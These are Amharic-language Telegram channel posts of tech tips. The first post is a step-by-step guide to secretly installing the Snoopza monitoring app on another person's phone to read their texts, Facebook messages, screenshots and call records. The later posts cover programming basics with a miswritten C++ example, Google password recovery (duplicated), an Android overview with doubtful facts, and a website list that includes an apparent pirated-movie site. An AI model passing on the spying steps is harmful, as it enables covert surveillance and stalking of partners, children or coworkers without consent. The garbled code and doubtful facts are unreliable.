👏👏👏ለዛሬ ቃል በገባነዉ መሰረት ገራሚ አፕ ይዘን መጥተናል። 🙏🙏🙏
ጥያቄ:-የ ሌላ ሠው ቴክስት(Sms)እንዴት አድርገን መጥለፍ እንችላለን።
😮😮እሄ አፕ ግን #text ብቻ ሳይሆን ሁሉንም መረጃ ነዉ #hack የሚያደርገዉ።
ለምሳሌ:- facebook message, ፎቶ screenshot, call record, ena text message።
እንዴት ነዉ ምንከፍተዉ
1, https://my.snoopza.com account create ያድርጉ።
2, email እና password እንዳይረሱ ምክንያቱም ለቀጣይ #step ያገለግላል።
3, https://get.snoopza.com/t973 እህንን በመንካት አፑን እናንተ ላይ ያዉርዱ
4, መጀመሪያ #create ያደረጋቹትን #email እና password ያስገቡ ካዛ spy ማድረግ ምትፈልጉት ሰው ,,, ልጅ እና የስራ ባልደረባ የሚለዉን ይምረጡ
4, ከዛ አፑን እናንተ ሞባይል ላይ ሁሉንም ከጨረሳቹሁ ብኋላ ለመጥለፍ ወደምፈልጉት ሞባይል ላይ አፑን ይጫኑ ከዛ የናንተን #email እና #password ያስገቡ ሌላው በናንተ ሞባይል ላይ ካደረጋቹሁት ጋ ተመሳሳይ ነዉ።
5, በመጨረሻ ምሆነዉን https://my.snoopza.com #account create ያደረጋቹበት ላይ #log in በማለት ሁሉንም ታገኛላቹሁ
ያልገባቹሁ ነገር ካለ ግልፅ ለማረግ ያህል #comment button አዘጋጅተናል ሁሉንም እዛ መወያያት እንችላለን

#Programming #language
ምንድነው! ስንት አይነት #ፕሮግራሚንግ #ቋንቋዎች አሉ?
✅በመጀመሪያ #ፕሮግራሚንግ ምንድነው? የሚለውን እንይ!
#ፕሮግራሚንግ ማለት አንድን ነገር ለመስራት እና ለሰራ ነው ስራ #output ለማግኘት በቅድሚያ #የምንፅፋቸው ነገሮች ስብሥብ #ፕሮግራሚንግ ይባላል!
ቀለል ያለ ምሳሌ እንጠቀም እስኪ!
#ካርድ ለመሙላት *805*22525828425400# 📤Call እንላለን! ቀጥሎ ያስገባነው የካርድ #ቁጥር ትክክል ከሆነ Dear Customer, Your Prepaid Account Has Been ReCharged Succesfully. የሚል #text ይደርሰናል ማለት ነው! ልክ እንደዚው የምንሰራው #ፕሮግራም ትክክል ከሆነ #output እናገኛለን! ካልሆነ ደግሞ ስህተት ነው ይላል ማለት ነው!
ለምሳሌ:- ከታች ያለውን ፕሮግራም እንመልከት!
# Include <Iostream>; Using NameSpace Std;
Int Main( )
{ Cout<<" Hello World"<<Endl;
Return 0; }
🔆Output :Hello World
💠ይህ ከላይ በ እንግሊዘኛ የተፃፋው " Hello World " የሚለውን ፅሁፍ #ስክሪኑ ላይ ያሳየናል! ይህ ፕሮግራም እንለዋለን!
✅አሁን ደግሞ #ፕሮግራሚንግ #ቋንቋ ምንድን ነው የሚለውን እናያለን!
▪️Programming Language ማለት የራሡ የሆነ የአፃፃፍ #ህግ ያለው ሆኖ የምንጽፋቸው ፕሮግራሞች በተስማሚ ሁኔታ የሚሰድር ማለት ነው! ከታች ያሉ የፕሮግራሚንግ ክፍፍሎችን እንመልከት
⚙Source Code:- እኛ የፃፍነው ፕሮግራም
⚙Machine Language:- ኮምፒውተር የሚረዳበት ቋንቋ!
⚙Syntax የፕሮግራሚንግ #ቋንቋ ምንነት ላይ ለመግለጽ እንደ ተሞከረው የራሡ የሆነ #የአፃፃፍ ህግ አለው ይህ የአፃፃፍ ህግ #Syntax ይባላል! ለአብነት ያህል አማርኛ ላይ ሰዋ-ሰው እንግሊዝኛ ላይ ደግሞ #Grammar እንደምንለው ማለት ነው!
💡ለመረዳት እንዲመች #Syntax መሰረት ያደረገ #ፕሮግራም እንመልከት!
# Include <Iostream>
Using NameSpace Std;
Int Main( )
{ Cout<<" Hello World"<<Endl; Return 0; }
🍡አንድን አረፍተ ነገር ፅፈን ስንጨርስ ለአማርኛ አራት ነጥብ (።) ለእንግሊዝኛ አንድ ነጥብ (.) ለ #ፕሮግራሚንግ #ቋንቋ ደግሞ ( ; ) እንጠቀማለን ነገር ግን ሁሉም ፕሮግራሚንግ #ቋንቋ ማለት ሳይሆን አብዛኞቹ!
✅ስለ #ፕሮግራሚንግ #ቋንቋ ይህን ያህል ካልን በመቀጠል ዋና ዋና የሚባሉ አይነቶቹን እንመልከት!
⚡️በአሁኑ ሠአት በአለማችን ላይ ብዙ አይነት እና ጥቅም ያላቸው #ፕሮግራሚንግ #ቋንቋዎች አሉ! ከነርሱም መካከል በዋናነት የሚጠቀሡት የሚከተሉት ናቸው!
🌏JS (JavaScript)
🌎C
🌍Phyton
🌎C++
🌎Go(Go lang)
🌎C#
🌎Java
🌎CSS
🌎Php ETC....
⚠️የምንለቃቸው አዳዲስ መረጃዎች በቶሎ እንዲደርሳችሁ የቻናላችን #Notification #On ማድረግዎን አይርሱ!

የኢሜል password ብንረሳዉስ🙈?
የኢሜል ፓስዋርዳችሁ ከጠፋባችሁ ከዚህ በታች ያሉትን እስቴፖች በመከተል የጠፋባችሁን የኢሜል ፓስዋርድ
አጥፍታችሁ #reset በማድረግ በአዲስ መቀየር ትችላላችሁ ።
👇👇
1⃣ ይከከን ማስፈንጠሪያ
https://accounts.google.com/signin/recovery
ተጭናችሁ ወደ #Google account recovery ፔጅ ግቡ።
2⃣ፖስዋርዱ የጠፋባችሁን ኢሜል አድራሻ (email address) አስገብታችሁ #forget password የሚለዉን በተን ተጫኑ።
3⃣የምታስታዉሱትን የ ኢሜል ፓስዋርድ እንድታስገቡ ይጠይቃችሗል።
✅እዚህ ላይ ያስታወስችሁትን የጠፋዉን ፖስዋርድ አስገቡ እና #Next የሚለዉን በተን ተጫኑ።
✅ብትሳሳቱም አትጨነቁ አካዉንታችሁን አይዘገሠዉም።
4⃣ከዛ #Google የሜረጋገጫ #Verification code
ኢሜሉን ስትከፍቱ ባስገባችሁት ስልክ ቁጥር ይልክላችሗል።
በምን ይልካል?
✅#Text or Call የሚል ሲመጣ የሚፈልጉትን የመቀበያ መንገድ ይምረጡ።
5⃣የተላከላችሁን ባለ 6 #digit የማረጋገጫ ኮድ አስገቡ።
6⃣ከዛ አዲስ ፖስዋርድ እንድታስጋቡ ይጠይቃችሗላ።
✅የፈለጉትን ፖስዋርድ እና ኮንፌርሜሽን ፓስዋርድ(መጀመሪያ ያስገባችሁትን ደግማችሁ አስገቡ) አስገብታችሁ
#Next የሚለዉን ሲጫኑ የጠፋዉ ፖስዋርድ በአዲስ ፓስወርድ ተቀየረ ማለት ነዉ።
✅በነገራችን ላይ ፖስዋርዳችሁን እስልካችሁ #Note book ላይ ብትጽፉት አሪፋ ነዉ ያዉ ደሞ እንዳይጠፉ ።
#Share

◼️Android ምንድን ነው?🙄🤔
◽️Android Open #Source የሆነ #Operating #System ሲሆን በብዛት ለስማርት ስልኮች ያገለግላል!
◽️ጉግል በ 2003 #አንድሮድን ያገኘ ሲሆን ከዚያ ጊዜ ወዲህ በዓለም ላይ ለተንቀሳቃሽ ስልኮች በጣም ታዋቂው #Operating #System ሲስተም ሊሆን ችሏል!
▪️Android ስራው ምንድን ነው?
◽️አንድሮድ #Operating #System ሲስተም ስለሆነ ዓላማው ተጠቃሚውን እና መሣሪያውን ማገናኘት ወይም ማግባባት ነው!
▫️ለምሳሌ : አንድ ተጠቃሚ #Text መላክ በሚፈልግበት ጊዜ አንድሮይድ ለተጠቃሚው የመፃፊያ #Keyboard ይሰጣል! ፅፎ ሲጨርስ ደግሞ ተጠቃሚው መላኪያውን በሚነካበት ጊዜ #Android መልእክቱ እንዲልክ ስልኩን ይመራዋል!
◽️Google በየአመቱ ለ Android System #Update ይለቃል! ምንም እንኳን Google ለ #Android እድገት ትልቅ ሚና ቢጫወትም ጉግል የ #Android #Operating ሲስተምን ለሞባይል አምራቾች በነፃ ይሰጣል!
◽️Electric ፣ Samsung ፣ LG ፣ Huawei ፣ Lenevo እና Sony አንድሮይድን በሚያመርቷቸው ስልኮች ላይ ከሚጭኑ አምራቾች ጥቂቶቹ ናቸው! በአሁን ሰአት Android Operating System በአንድ ቢሊዮን ሞባይሎች ላይ ተጭኖ አገልግሎት እየሰጠ ይገኛል!
◽️ብዙ ሰዎች የሚያነሱት አንድ የተለመደ ጥያቄ Android ለምን በተለያዩ ስልኮች ላይ የተለያየ መልክ ይይዛል? የሚል ነው! መልሱም ብዙ የ #Android ስሪቶች አሉ ምክንያቱም #AndroidOpenSource #ሶፍትዌር ስለሆነ የሞባይል አምራቾች በሶፍትዌሩ ላይ የሚፈልጓቸውን ለውጦችን ማድረግ ይችላሉ!
⚠️የምንለቃቸው አዳዲስ መረጃዎች በቶሎ እንዲደርሳችሁ የቻናላችን #Notification #On ማድረግዎን አይርሱ!
https://t.me/joinchat/VP0zpywjPkTwuCtW

የኢሜል ፓስዋርዳችንን ብንረሳዉስ🙈?
የኢሜል ፓስዋርዳችሁ ከጠፋባችሁ ከዚህ በታች ያሉትን እስቴፖች በመከተል የጠፋባችሁን የኢሜል ፓስዋርድ
አጥፍታችሁ #reset በማድረግ በአዲስ መቀየር ትችላላችሁ ።
👇👇
1️⃣ ይከከን ማስፈንጠሪያ
https://accounts.google.com/signin/recovery
ተጭናችሁ ወደ #Google account recovery ፔጅ ግቡ።
2️⃣ፖስዋርዱ የጠፋባችሁን ኢሜል አድራሻ (email address) አስገብታችሁ #forget password የሚለዉን በተን ተጫኑ።
3️⃣የምታስታዉሱትን የ ኢሜል ፓስዋርድ እንድታስገቡ ይጠይቃችሗል።
✅እዚህ ላይ ያስታወስችሁትን የጠፋዉን ፖስዋርድ አስገቡ እና #Next የሚለዉን በተን ተጫኑ።
✅ብትሳሳቱም አትጨነቁ አካዉንታችሁን አይዘገሠዉም።
4️⃣ከዛ #Google የሜረጋገጫ #Verification code
ኢሜሉን ስትከፍቱ ባስገባችሁት ስልክ ቁጥር ይልክላችሗል።
በምን ይልካል?
✅#Text or Call የሚል ሲመጣ የሚፈልጉትን የመቀበያ መንገድ ይምረጡ።
5️⃣የተላከላችሁን ባለ 6 #digit የማረጋገጫ ኮድ አስገቡ።
6️⃣ከዛ አዲስ ፖስዋርድ እንድታስጋቡ ይጠይቃችሗላ።
✅የፈለጉትን ፖስዋርድ እና ኮንፌርሜሽን ፓስዋርድ(መጀመሪያ ያስገባችሁትን ደግማችሁ አስገቡ) አስገብታችሁ
#Next የሚለዉን ሲጫኑ የጠፋዉ ፖስዋርድ በአዲስ ፓስወርድ ተቀየረ ማለት ነዉ።
✅በነገራችን ላይ ፖስዋርዳችሁን እስልካችሁ #Note book ላይ ብትጽፉት አሪፋ ነዉ ያዉ ደሞ እንዳይጠፉ ።
የኢሜል ፓስዋርዳችሁ ከጠፋባችሁ ከዚህ በታች ያሉትን እስቴፖች በመከተል የጠፋባችሁን የኢሜል ፓስዋርድ
አጥፍታችሁ #reset በማድረግ በአዲስ መቀየር ትችላላችሁ ።
👇👇
1️⃣ ይከከን ማስፈንጠሪያ
https://accounts.google.com/signin/recovery
ተጭናችሁ ወደ #Google account recovery ፔጅ ግቡ።
2️⃣ፖስዋርዱ የጠፋባችሁን ኢሜል አድራሻ (email address) አስገብታችሁ #forget password የሚለዉን በተን ተጫኑ።
3️⃣የምታስታዉሱትን የ ኢሜል ፓስዋርድ እንድታስገቡ ይጠይቃችሗል።
✅እዚህ ላይ ያስታወስችሁትን የጠፋዉን ፖስዋርድ አስገቡ እና #Next የሚለዉን በተን ተጫኑ።
✅ብትሳሳቱም አትጨነቁ አካዉንታችሁን አይዘገሠዉም።
4️⃣ከዛ #Google የሜረጋገጫ #Verification code
ኢሜሉን ስትከፍቱ ባስገባችሁት ስልክ ቁጥር ይልክላችሗል።
በምን ይልካል?
✅#Text or Call የሚል ሲመጣ የሚፈልጉትን የመቀበያ መንገድ ይምረጡ።
5️⃣የተላከላችሁን ባለ 6 #digit የማረጋገጫ ኮድ አስገቡ።
6️⃣ከዛ አዲስ ፖስዋርድ እንድታስጋቡ ይጠይቃችሗላ።
✅የፈለጉትን ፖስዋርድ እና ኮንፌርሜሽን ፓስዋርድ(መጀመሪያ ያስገባችሁትን ደግማችሁ አስገቡ) አስገብታችሁ
#Next የሚለዉን ሲጫኑ የጠፋዉ ፖስዋርድ በአዲስ ፓስወርድ ተቀየረ ማለት ነዉ።
✅በነገራችን ላይ ፖስዋርዳችሁን እስልካችሁ #Note book ላይ ብትጽፉት አሪፋ ነዉ ያዉ ደሞ እንዳይጠፉ ።
📿 5 Random ጠቃሚ ዌብሳይቶች
✔️ የማንኛውንም #ሙዚቃ ድምፁንና ክላሲካሉን ለመለየት የሚጥቅማችሁ ድረገፅ
https://vocalremover.org/
✔️ #Text አስገብታችሁ ወደ #image ለመቀየርና download ለማድረግ
https://ideogram.ai/
✔️ አሪፍ አሪፍ #ፊልሞችን Download ለማድረግ ወይም ቀጥታ ለማየት
https://moviesjoy.is/movie
✔️ የተለያዩ #programing language ፕሮጀክቶችን የምታገኙበት
https://code-projects.org/
✔️ #Essay writer, summarizer, and citation website
https://www.kipper.ai